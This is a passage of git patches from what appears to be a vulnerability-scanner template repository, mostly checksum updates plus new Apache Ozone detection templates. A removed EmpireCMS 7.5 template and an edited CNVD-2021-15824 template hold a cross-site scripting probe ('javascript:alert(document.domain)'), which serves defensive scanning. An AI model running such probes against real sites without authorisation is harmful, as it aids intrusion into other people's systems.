-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:294c7434abee8899fcf7907b347dd8da78c6da63 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:aa2012c7b220df9304c5e7136f0a65151b05e799 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:6cbd2c37290c72dd168f5ecf2e1809cef400492f +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:5d2df892fb2ac54cfde6df099f5c02ad00bcdae3 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:bcb05ad7ca6a68175730f60dc541b2e681215521 +http/technologies/wordpress/plugins/woocommerce-services.yaml:d6c77cbedfe424f47227bd0c19412866ebd925cf +http/technologies/wordpress/plugins/woocommerce.yaml:666e01577b8f949e9bb77d0c80a9559ac1276f7a +http/technologies/wordpress/plugins/wordfence.yaml:91c28e9577ab467b6a3e5f0c8ebb743a408e7049 +http/technologies/wordpress/plugins/wordpress-importer.yaml:33fa033d6c9faa3ac97c940148e3175388a50621 +http/technologies/wordpress/plugins/wordpress-seo.yaml:d847216a5097fa6f600ef6d0e7889803b8986bb8 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:b67c1aaa00a8f9bb1b14e5669b686e4bb0d9544b +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:f32a9b560458276e9bdded8767c3d648040c2088 +http/technologies/wordpress/plugins/wp-file-manager.yaml:2d0dfda02d741eafa94293ee3acc1f29a899bb7c +http/technologies/wordpress/plugins/wp-google-maps.yaml:400e2f66a1cc853dc214783b259fd6cf8915764f +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:8ef216b1cb8322ee974033351a6bd6822a5c54ae +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:1b04964ce7c9d28fca99c646706322a3fbc07046 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:87cf5360bc373ded6ba5e6d63bc6c2233658444b +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:264f60522dd91e6beb72a5ff087145144d9dbcec +http/technologies/wordpress/plugins/wp-optimize.yaml:63ec01f92e69db4120dfa53954673d77ce08d677 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:5416c2bbbcbedd6ceb1bf25307a3736548c180d5 +http/technologies/wordpress/plugins/wp-reset.yaml:2e6c66afb9d3fc4bff9aa1ad5d291db99d4432ac +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:5c92045038d77527bd77c5b8e1fceaaec61f0aa5 +http/technologies/wordpress/plugins/wp-rollback.yaml:359caa5ba74eda80215445401911e553271074c6 +http/technologies/wordpress/plugins/wp-seopress.yaml:0973617dc3ff63341016addeeda6cb61ecd529e3 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:74a96d30e68e41ebcddf7800a3101fe00e91dc00 +http/technologies/wordpress/plugins/wp-smushit.yaml:18153a5981abd160d9f7e49fa1a9b265985d8d91 +http/technologies/wordpress/plugins/wp-statistics.yaml:3dd770a375e986ef8fbc71190c9cb80a8262fc35 +http/technologies/wordpress/plugins/wp-super-cache.yaml:7c42ff5457c3ae6168dbf61a451127ccafceaa9d http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:fa1f9d043a9ed24d60ff179ad7c53d8a62b5d080 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:f7c444844389673b9ee38cae71bb287bc13c2177 +http/technologies/wordpress/plugins/wpforms-lite.yaml:18d3a2306187baca443d85f964fd88a5c6279571 +http/technologies/wordpress/plugins/wps-hide-login.yaml:8983308eda9ff079ecc6dd650ccce1a75589c66a +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:12ad0ab316fabb50b81984d70a5ec919b057b1c3 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:5e465c8d86b72daa14c25e2cc1557f47bd49f1f3 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -7843,7 +7843,7 @@ http/vulnerabilities/generic/generic-windows-lfi.yaml:ddcb321d2bb5e3e9bee57a6593 http/vulnerabilities/generic/host-header-injection.yaml:827f0694d3294d945da80d2dd7aa2ed3e820fc68 http/vulnerabilities/generic/oob-header-based-interaction.yaml:2cac39750dee5c610c6c1023a6fa0c73199e66ec http/vulnerabilities/generic/oob-param-based-interaction.yaml:635728a0bd7fbecc745a2be8d7a51b02ed0ee57b -http/vulnerabilities/generic/open-redirect-generic.yaml:2e22c02de6e4dfb30dd01c6fd4f95f92cb55b9c3 +http/vulnerabilities/generic/open-redirect-generic.yaml:31c3f7da650163101c93e40cf57282aeefcea11b http/vulnerabilities/generic/request-based-interaction.yaml:d3d7eaea6c38c5463861075a7542ed9c7e8f119e http/vulnerabilities/generic/top-xss-params.yaml:3e9a7e3fa96022f53af19ddd617225731c3bd9df http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml:0a058b056b1584bc9de28df14baa9b57be220e88 @@ -8873,7 +8873,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e6d1bc6380df4f00e3f5119f0dbb97a128685d39 +templates-checksum.txt:3e7c8b0e0bf0eab7c9d437bb65f9088a97313ed3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a6b2d3a3d964f9060d8ba9eeecbdf8abb01e4811 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jul 2024 08:46:14 +0000 Subject: [PATCH 1206/1841] Auto Template Signing [Sun Jul 14 08:46:14 UTC 2024] :robot: --- http/misconfiguration/mixed-active-content.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/mixed-active-content.yaml b/http/misconfiguration/mixed-active-content.yaml index 5bdbf3caee..10441a3c6e 100644 --- a/http/misconfiguration/mixed-active-content.yaml +++ b/http/misconfiguration/mixed-active-content.yaml @@ -49,4 +49,4 @@ http: - "]*src=['\"](http[^s'\">][^'\">]*)['\"]" - "]*src=['\"](http[^s'\">][^'\">]*)['\"]" - "]*data=['\"](http[^s'\">][^'\">]*)['\"]" -# digest: 490a00463044022071351cac7771373802b705ea74cc8edd9b9be04149b88d1db971b1cf7750d7a9022071c782b36b8dc9cc820ab0f2ea1483a86b1ac8f2351c811c24c5c8dfb84ebfaf:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207e05fa38b8782a2e249d4c61827bf1869187c72c9cf5f80d7670be13f27c809802203060c90b8a8455be0327f1173c37d4d9e52cdf6c01ef06f9b5cfcbab39ecc40d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 64656d05f0c200943fe16f45fdef12446dfdc143 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 14 Jul 2024 14:20:32 +0530 Subject: [PATCH 1207/1841] Update .nuclei-ignore --- .nuclei-ignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.nuclei-ignore b/.nuclei-ignore index 40836fa6c0..14b33099cf 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -39,3 +39,4 @@ files: - javascript/enumeration/pop3/pop3-capabilities-enum.yaml - javascript/enumeration/redis/redis-require-auth.yaml - dast/vulnerabilities/sqli/time-based-sqli.yaml + - javascript/enumeration/minecraft-enum.yaml From 18cb5270b74604b256f339b0a6bd739afa4225b4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 14 Jul 2024 14:22:41 +0530 Subject: [PATCH 1208/1841] Update CNVD-2021-15824.yaml --- http/cnvd/2021/CNVD-2021-15824.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/http/cnvd/2021/CNVD-2021-15824.yaml b/http/cnvd/2021/CNVD-2021-15824.yaml index dbb5112764..31ef878ebb 100644 --- a/http/cnvd/2021/CNVD-2021-15824.yaml +++ b/http/cnvd/2021/CNVD-2021-15824.yaml @@ -1,14 +1,15 @@ id: CNVD-2021-15824 info: - name: EmpireCMS DOM Cross Site-Scripting - author: daffainfo + name: EmpireCMS 7.5 - Cross-Site Scripting + author: daffainfo,pikpikcu severity: high description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack. reference: - https://sourceforge.net/projects/empirecms/ - https://www.bilibili.com/read/cv10441910 - https://vul.wangan.com/a/CNVD-2021-15824 + - https://github.com/leadscloud/EmpireCMS/issues/4 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 @@ -34,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bd99bed51a9176fa2d9b166aa56e5dbf68db6cca10c27260f127129ae6b78ac102201d3585044ed11e562a6aadf90a7c422d2e85de8e1dc023be26456cfa76fbefaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bd99bed51a9176fa2d9b166aa56e5dbf68db6cca10c27260f127129ae6b78ac102201d3585044ed11e562a6aadf90a7c422d2e85de8e1dc023be26456cfa76fbefaf:922c64590222798bb761d5b6d8e72950 From 06587aee5094185ce588501cb98ebef6ae66dfea Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 14 Jul 2024 14:24:20 +0530 Subject: [PATCH 1209/1841] Delete http/vulnerabilities/other/empirecms-xss.yaml --- http/vulnerabilities/other/empirecms-xss.yaml | 34 ------------------- 1 file changed, 34 deletions(-) delete mode 100644 http/vulnerabilities/other/empirecms-xss.yaml diff --git a/http/vulnerabilities/other/empirecms-xss.yaml b/http/vulnerabilities/other/empirecms-xss.yaml deleted file mode 100644 index 993a83d2ff..0000000000 --- a/http/vulnerabilities/other/empirecms-xss.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: empirecms-xss - -info: - name: EmpireCMS 7.5 - Cross-Site Scripting - author: pikpikcu - severity: high - description: EmpireCMS 7.5 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks. - reference: - - https://www.geek-share.com/detail/2777280260.html - - https://github.com/leadscloud/EmpireCMS/issues/4 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - metadata: - max-request: 1 - tags: empirecms,xss - -http: - - method: GET - path: - - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(document.domain)" - - matchers-condition: and - matchers: - - type: word - words: - - 'onmousewheel=\"return bbimg(this)\"' - - - type: status - status: - - 200 - -# digest: 4b0a004830460221008c6c6316e9049fba3eb3b61777a0da5a43b9d98ca3781ff694e342671427c0dc022100e90e7144d405eed50aa06619ddecd3f334994ff65c27b9bd32fddeef4e87db0e:922c64590222798bb761d5b6d8e72950 From fa74783a274ac6178460c854e296bccb10aae229 Mon Sep 17 00:00:00 2001 From: Icaro Torres <18042205+icarot@users.noreply.github.com> Date: Sun, 14 Jul 2024 15:11:25 -0300 Subject: [PATCH 1210/1841] Create apache-ozone-detect.yaml Detects a Apache Ozone web application, a scalable, redundant, and distributed object store for Hadoop and Cloud-native environments. --- .../apache/apache-ozone-detect.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/technologies/apache/apache-ozone-detect.yaml diff --git a/http/technologies/apache/apache-ozone-detect.yaml b/http/technologies/apache/apache-ozone-detect.yaml new file mode 100644 index 0000000000..7b18255a1c --- /dev/null +++ b/http/technologies/apache/apache-ozone-detect.yaml @@ -0,0 +1,32 @@ +id: apache-ozone-detect + +info: + name: Apache Ozone - Detect + author: icarot + severity: info + description: | + Detects a Apache Ozone web application, a scalable, redundant, and distributed object store for Hadoop and Cloud-native environments. + classification: + cpe: cpe:2.3:a:apache:ozone:-:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: true + vendor: apache + product: ozone + shodan-query: title:"Apache Ozone" + tags: tech,ozone,apache,detect + +http: + - method: GET + path: + - "{{BaseURL}}/static/" + + matchers-condition: and + matchers: + - type: word + words: + - 'Apache Ozone' + + - type: status + status: + - 200 From 4ec59411ea1559d3e78335120cc2fe08c4d2c1eb Mon Sep 17 00:00:00 2001 From: Icaro Torres <18042205+icarot@users.noreply.github.com> Date: Sun, 14 Jul 2024 15:15:18 -0300 Subject: [PATCH 1211/1841] Create apache-ozone-conf.yaml Detects if path /conf of Apache Ozone web application is exposed. --- http/exposures/configs/apache-ozone-conf.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/exposures/configs/apache-ozone-conf.yaml diff --git a/http/exposures/configs/apache-ozone-conf.yaml b/http/exposures/configs/apache-ozone-conf.yaml new file mode 100644 index 0000000000..5c80a56ec3 --- /dev/null +++ b/http/exposures/configs/apache-ozone-conf.yaml @@ -0,0 +1,32 @@ +id: apache-ozone-conf + +info: + name: Apache Ozone - Exposure + author: icarot + severity: info + description: | + Detects if path /conf of Apache Ozone web application is exposed. + classification: + cpe: cpe:2.3:a:apache:ozone:-:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: ozone + shodan-query: title:"Apache Ozone" + tags: tech,ozone,apache,detect + +http: + - method: GET + path: + - "{{BaseURL}}/conf" + + matchers-condition: and + matchers: + - type: word + words: + - 'ozone-default.xml' + - 'ozone' + + - type: status + status: + - 200 From 8e2078308fb03b4c62e011cc11367074fc174be8 Mon Sep 17 00:00:00 2001 From: Icaro Torres <18042205+icarot@users.noreply.github.com> Date: Sun, 14 Jul 2024 15:16:54 -0300 Subject: [PATCH 1212/1841] Update apache-ozone-detect.yaml Detects if path /conf of Apache Ozone web application is exposed. --- http/technologies/apache/apache-ozone-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/technologies/apache/apache-ozone-detect.yaml b/http/technologies/apache/apache-ozone-detect.yaml index 7b18255a1c..2e7d2b908f 100644 --- a/http/technologies/apache/apache-ozone-detect.yaml +++ b/http/technologies/apache/apache-ozone-detect.yaml @@ -10,7 +10,6 @@ info: cpe: cpe:2.3:a:apache:ozone:-:*:*:*:*:*:*:* metadata: max-request: 1 - verified: true vendor: apache product: ozone shodan-query: title:"Apache Ozone" From c7320d04e520f0137c27aa5222cc5726d9a5803b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 00:20:42 +0000 Subject: [PATCH 1213/1841] Auto WordPress Plugins Update [Mon Jul 15 00:20:42 UTC 2024] :robot: --- helpers/wordpress/plugins/elementskit-lite.txt | 2 +- helpers/wordpress/plugins/wp-fastest-cache.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - 